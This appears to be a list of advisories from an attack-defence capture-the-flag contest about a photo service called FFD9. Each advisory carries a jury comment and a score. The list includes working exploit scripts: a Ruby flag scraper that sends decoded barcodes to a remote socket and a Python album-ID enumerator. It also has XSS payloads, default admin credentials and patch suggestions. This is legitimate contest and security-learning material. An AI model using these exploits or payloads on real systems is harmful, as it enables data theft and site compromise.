FFD9 Advisories


Service:FFD9
Text:FFD9

vuln: you can load ANY files from your FS, they can be shells on perl
tell me please how 2 use it =)
solution : check the signature
Jury comment:Plz, prove this and get patch and exploit
Score:0/10 points


Service:FFD9
Text:you can find pictures similar to flag which are barcodes.

exploit: get one picture of flag (barcode) and search it. Will get several new pictures, decode it -> get flags.
Jury comment:Yes. Please get patch and code of exploit.
Score:2/5 points

Service:FFD9
Text:part of exploit:


for team in 1..99 do
next if team == $myteam
begin
www.goto "http://10.23.#{team}.3"

www.file_field(:name, "searh_image").set "D:\\1.png"
www.text_field(:id, "magick_input").set "-30"
www.image(:id, "find_image").click

images_ar=[]
www.html.scan(/IMG alt="" src="(\/photo\/[^"]*)" width=400/m){|im|
images_ar.push im
}

otvets_ar=[]
images_ar.each{|im|

Net::HTTP.start("10.23.#{team}.3") { |http|
resp = http.get("#{im}.png")
open("flags/#{im.to_s.gsub('/','')}.png", "wb") { |file|
file.write(resp.body)
}
n_a = `C:\\Program Files\\ZBar\\bin\\zbarimg.exe -d -q -D D:\\coding\\ructfe2011\\flags\\#{im.to_s.gsub('/','')}.png`
otvets_ar.push n_a.gsub('CODE-128:','')
}
puts otvets_ar
t = TCPSocket.new('10.23.41.162', 31337)
t.gets
t.puts otvets_ar.join(' ')
ttt = t.gets
puts ttt
t.close
}

rescue
puts "error #{team}"
end


end
Jury comment:Cool, but patch is not avaliable for now
Score:2/5 points

Service:FFD9
Text:patch is to cut off similar fotos from the search output. file find.html.ep
Jury comment:It's broke service functionality
Score:0/5 points

Service:FFD9
Text:patch for similar fotos :

add private => 0 in find_one function . File FFD9DB.pm, line 198
Jury comment:Ok
Score:1/5 point


Service:FFD9
Text:Album IDs are predictable from user IDs:
The game server submits flags to FFD9 as album titles. It does this by creating a new user and subsequently creating a new album. If you know the user ID (i.e. by using the URL http://10.23.?.3/users/), you only have to increment the ID by 1 in order to get a valid album ID. By using http://10.23.?.3/user/album/<aid> you can then determine the name of that album and hence captured the flag.

Resolution:
Instead of using the mongodb ObjectID as the (secret) id of albums, generate an actual random number and use that one as the key to identify albums. (Requires some coding.)

An easier resolution is to just resolve the http://10.23.?.3/users/ weakness. User IDs are still drawn deterministically but that way album IDs become much harder to guess.
Jury comment:Yes, please provide patch for full points
Score:5/8 points

Service:FFD9
Text:
------------------------------ [[ FluxFingers ]] ------------------------------
--[ Description ]--------------------------------------------------------------
It is possible to read the flags from the album.

--[ Patch ]--------------------------------------------------------------------
/public/js/index.js
Line: 61

Change:
$(s).appendTo('#users');
to
$(z).appendTo('#users');

--[ Exploit ]------------------------------------------------------------------
1. Get the User Id, which is in the link on your index (like <a href="/user/4ec7c9283a1171b201000003">chnmvwvfzvjr</a>)
the user id is 4ec7c9283a1171b201000003
2. Increment this to 4ec7c9283a1171b201000004
3. Call http://$ip/user/album/4ec7c9283a1171b201000004
4. Get the flag :) (its like: Name: FHT0S596XY2P438GUYOH7TDZDKF6PRX=)
Jury comment:Yes, but exploit already posted. And this patch don't work in all cases. (http://ip/users)
Score:1/8 point

Service:FFD9
Text:Exploit for getting flags from non-patched service


regexp = "\w{24}"
flag = "\w{31}="

d = urllib2.urlopen(url=sys.argv[1] + "/users", timeout=20)
s = d.read()
uids = re.findall(regexp, s)

for uid in uids[-20:]:
aid = int(uid, 16) + 1
try:
al = urllib2.urlopen(url=sys.argv[1] + ("/user/album/%x"%aid), timeout = 5)
for f in re.findall(flag, al.read()):
print f
except urllib2.HTTPError:
pass
except urllib2.URLError:
pass
Jury comment:Already posted by other team
Score:0/8 points


Service:FFD9
Text:You can see all users id by going to url http://10.23.x.y/users
Jury comment:Ok
Score:1/1 point


Service:FFD9
Text:login to system with credentials admin : admin - get access to site
Jury comment:It is test user. Not a bug.
Score:0/1 points

Service:FFD9
Text:You can log in as admin with username 'admin' pass 'admin' after service starts
Jury comment:It is test user. Not a bug.
Score:0/1 points

Service:FFD9
Text:db collection has 'admin':'admin' entry
Jury comment:It is test user. Not a bug.
Score:0/1 points

Service:FFD9
Text:FFD9, which runs on Port 80 of the VulnBox, has a default username / password pair of admin:admin

To fix:

Connect to the database for ffd9::
mongo ffd0

Generate a new Password:
echo -n "F00" | md5sum

change the admin passwort:
db.users.update({name:"admin"}, {$set:{pass: "MD5SUM"}})




Jury comment:It is not a bug. It is test user.
Score:0/1 points

Service:FFD9
Text:default pass for admin is admin
Jury comment:Yes. It is not bug. It is test user
Score:0/1 points


Service:FFD9
Text:using 10.23.%teamAddr%.%battlePort% you can get users, there are users id`s. using user id you can connect as http://10.23.48.133/user/%userId%

close it by .htaccess
Jury comment:plz, prove it
Score:0/5 points


Service:FFD9
Text:Its possible to extract all currently stored flags (decoded barcodes from uploaded images) by using the find feature.
Since the value of the magick_input field is not properly sanitized one can provide arbitrary large values (>30).
Due to this all images are considered similar to the one uploaded (See javascript code in FFD9DB.pm[search function])

This can be easily prevent by sanitizing the supplied value:
var m = <%= $m %>;
if (m > 30) {
m = 30
}
var n = <%= $n %> + m;
...
Jury comment:this does not fix vuln. also not exploit.
Score:2/10 points


Service:FFD9
Text:"data.widht" - typo at file: index.js, str: 73
Jury comment:Yes ;). But it is not security bug.
Score:0/1 points


Service:FFD9
Text:You can upload any file via admin upload. Parses only extension
Jury comment:No. You can not upload any file. Please prove it.
Score:0/1 points

Service:FFD9
Text:You can upload any file with "image" extension, for example "JPG", via upload. Destination can be found via looking page source.
Jury comment:Yes, but it is not a security bug
Score:0/1 points

Service:FFD9
Text:patching possibility of including files:
my ($x,$y,$z)=unpack("CCC",$String);
my $c = chr $x;
$c.= chr $y;
$c.= chr $z;

if ( $c !eq "яШя") {
#go home
}
for jpg files or smth like this
Jury comment:It's checked in other place
Score:0/1 points


Service:FFD9
Text:===== Team: My Little Pwnies ======================================
=== Number: 82 ====================================================
===== Time: 11/19/2011 @ 16:10 UTC =================================

-------------------------------------------------------------------
--- 1. Summary: ---------------------------------------------------
-------------------------------------------------------------------

The FFD9 service has XSS in the Ablum Name Field after the user logs in.


-------------------------------------------------------------------
--- 2. Description: -----------------------------------------------
-------------------------------------------------------------------

When entering an album name, malicious script can be entered to create reflective XSS in the album name.
Upon refreshing the page this is displayed with filtered characters.

-------------------------------------------------------------------
--- 3. Impact: ----------------------------------------------------
-------------------------------------------------------------------

Potentially allow an attacker to insert malicious page into a user's page thereby controlling their session thereafter or stealing cookies.

-------------------------------------------------------------------
--- 4. Affected Services: -----------------------------------------
-------------------------------------------------------------------

FFD9 Album name

-------------------------------------------------------------------
--- 5. Solution: --------------------------------------------------
-------------------------------------------------------------------

Filter characters such as [<>/&%();'"] and script tags.

-------------------------------------------------------------------
--- 6. Time Table: ------------------------------------------------
-------------------------------------------------------------------

11/19/2011 - 11:10am submitted
Jury comment:This only works for you and works only while create a new album. Scripts are not executed when displaying a list of album.
Score:0/1 points

Service:FFD9
Text:album name is xss vulnerabed, put
<a href="#" onclick="now();function now() {for (i=1;i>0;i++){open('DieScript.htm','new'+i);}}">myname</a>
and get saaaad..
solution : use standart escape functions
Jury comment:This only works for you and works only while create a new album. Scripts are not executed when displaying a list of album.
Score:0/1 points


Service:FFD9
Text:
Service: FFD9

Vulnerability: XSS
You can register new users and inject code over the username.

Exploit:
Register a user named "<iframe>". In the userlist the name is printed directly and an iframe appears.

Fix:
Use the Perl module HTML::Entities to fix this problem.

HTML::Entities::encode($text);
Jury comment:Ok
Score:2/2 points

Service:FFD9
Text:ATTENTION: This advisory is similar to the old one but another form is vulnerable


Service: FFD9

Vulnerability: XSS
You can register new users and inject code over the username.

Exploit:
Create an album named "<iframe>". In the albumlist the name is printed directly and an iframe appears.

Fix:
Use the Perl module HTML::Entities to fix this problem.

HTML::Entities::encode($text);
Jury comment:Repeat.
Score:0/2 points

Service:FFD9
Text:Cross site scripting vulnerability in username entry
Jury comment:Already post
Score:0/2 points

Service:FFD9
Text:1) Description of Vulnerability

XSS

======================================================================
2) Exploit / PoC

Use:

asd6<img%20src%3da%20onmouseover%3dalert(1)>f8baa65cb68

for

http://10.23.XX.3/ - login function

======================================================================
3) Patch

avoid the usage of html encoding

======================================================================
Jury comment:Already posted
Score:0/2 points

Service:FFD9
Text:XSS when registering a user can delete all content on the page, bringing the service down
Jury comment:Already posted.
Score:0/2 points